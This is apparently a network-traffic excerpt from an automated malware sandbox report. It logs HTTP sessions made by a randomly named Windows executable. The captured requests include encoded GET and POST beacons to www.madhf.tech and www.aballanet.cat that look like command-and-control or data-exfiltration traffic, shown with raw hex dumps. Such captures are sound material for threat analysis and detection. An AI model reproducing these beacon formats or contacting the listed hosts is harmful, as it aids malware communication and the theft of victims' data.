EK6Etjp2tYCCKpm26DBaSQUBOilCjFq3sDRBuIHSBHaM7tkcPe0cBj/B1pSnum [TRUNCATED]
Jan 11, 2025 02:50:34.054550886 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:50:33 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 11, 2025 02:50:34.054574966 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 11, 2025 02:50:34.054585934 CET	1236	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 11, 2025 02:50:34.054667950 CET	1236	IN	Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
Jan 11, 2025 02:50:34.054681063 CET	724	IN	Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
Jan 11, 2025 02:50:34.054701090 CET	1236	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
Jan 11, 2025 02:50:34.054713964 CET	1236	IN	Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
Jan 11, 2025 02:50:34.054788113 CET	1236	IN	Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
Jan 11, 2025 02:50:34.054802895 CET	672	IN	Data Raw: 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 Data Ascii: 0,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65
Jan 11, 2025 02:50:34.054814100 CET	1236	IN	Data Raw: 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d Data Ascii: nt-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset
Jan 11, 2025 02:50:34.059672117 CET	1236	IN	Data Raw: 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 63 6f 6c 6f 72 7b Data Ascii: or{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	134.0.14.158	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:35.750598907 CET	376	OUT	GET /6xrr/?T0JX6z9=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&Ih6=GzF8v0ph3F HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.aballanet.cat User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 02:50:36.585488081 CET	504	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 11 Jan 2025 01:50:36 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&Ih6=GzF8v0ph3F Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	103.224.182.242	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:41.930479050 CET	627	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 56 4d 4b 71 73 68 6e 59 56 43 43 79 58 72 50 52 78 47 72 48 41 78 55 52 48 6e 39 5a 38 65 4f 6a 51 6b 59 6a 6f 73 3d Data Ascii: T0JX6z9=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2UVMKqshnYVCCyXrPRxGrHAxURHn9Z8eOjQkYjos=
Jan 11, 2025 02:50:42.527854919 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 01:50:42 GMT server: Apache set-cookie: __tad=1736560242.4208591; expires=Tue, 09-Jan-2035 01:50:42 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49715	103.224.182.242	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:44.471990108 CET	647	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 5a 2f 52 45 50 4c 63 4c 44 6d 35 7a 30 6f 39 2f 37 4e 49 4a 66 4a 34 4f 54 47 38 4b 7a 49 42 69 67 32 30 59 6c 4e Data Ascii: T0JX6z9=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEAZ/REPLcLDm5z0o9/7NIJfJ4OTG8KzIBig20YlN
Jan 11, 2025 02:50:45.087877035 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 01:50:44 GMT server: Apache set-cookie: __tad=1736560245.6447207; expires=Tue, 09-Jan-2035 01:50:45 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49722	103.224.182.242	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:47.020989895 CET	1664	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 79 6d 31 32 76 35 61 44 65 48 66 44 35 71 49 55 4f 76 63 38 33 4a 79 6a 6b 5a 31 66 58 4d 46 2f 54 47 79 38 75 49 38 38 44 41 64 30 77 2b 38 50 67 33 59 42 69 71 62 77 45 72 30 39 32 31 4e 67 74 75 4a 56 47 59 69 66 56 33 57 69 56 55 35 4e 54 78 52 34 4d 45 38 6a 66 45 59 4e 54 39 74 2b 4f 36 41 2b 6b 5a 61 2f 57 48 54 62 69 4e 4d 67 45 4b 78 51 4d 48 57 65 63 43 70 52 51 55 72 55 34 36 51 41 47 57 75 4c 30 77 61 2b 6c 50 61 57 6e 68 6b 79 54 6b 4b 4e 37 4f 51 50 64 6a 41 77 [TRUNCATED] Data Ascii: T0JX6z9=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QEym12v5aDeHfD5qIUOvc83JyjkZ1fXMF/TGy8uI88DAd0w+8Pg3YBiqbwEr0921NgtuJVGYifV3WiVU5NTxR4ME8jfEYNT9t+O6A+kZa/WHTbiNMgEKxQMHWecCpRQUrU46QAGWuL0wa+lPaWnhkyTkKN7OQPdjAwieFHkd5Ge16QeoyP6i/p0T08QcXOpHlEDICQvJ70yIoMp/0wFvGmMhiruaRdSFy5qVpmNxeM3u4+JOvHZ4juzC7zPOrp173Yu19Gtyz1lycKhnkctJjtURxKTLVSn1OtKs4UAePRIv7FA28CVtaAB1icCzT6TTdwGs+dbLy9AldXFPlUpqXM/Kio8kKtgkFZGscJe+3BY3EZbYAs9SUGnD8FRPq4kY0m54r4UD5jDrB3emy4N6c/CMp4yC+6kAHQz/DZjXhSRhpGu0WLqZqi8vPWTQs05KewGgtuzO9j3su8Az4P2x6+xI+szdByE5LSPaQXSk03mno5EgoNrLDn23CN+BqPEzCjElMZ7QRKXaeqXtAbLRLBcQuHX1LkATxrEgWaeOOhcVinVH2CkHkoOLTFy11+XkSap3vfbBngDkJ2Kl/LcypV8s6TCtFX73XOfjclWOy86KvRmuNlaWYPm8G+Zhhzc44/NdcZWR+s4PyCVWaBVBsmcaStBxXEuppD/U4BcbVgm7X/YTGwLQDgK5vdsGqi/7cekukD8JQcpyVkV0oMKxn7rj8dhEeQFQg3UoQpvjtjYjfhFdYJdO1rWAxEdng+UAkgdYAGpEXQ08OVSPnya+wl4BQaLlEOWgyJ9NayqKOaR6bRb+wxNlNjJV+o5Q+g33+605 [TRUNCATED]
Jan 11, 2025 02:50:47.622678041 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 01:50:47 GMT server: Apache set-cookie: __tad=1736560247.2237084; expires=Tue, 09-Jan-2035 01:50:47 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49738	103.224.182.242	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:49.563657045 CET	373	OUT	GET /0mwe/?Ih6=GzF8v0ph3F&T0JX6z9=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.madhf.tech User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49952	185.27.134.206	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
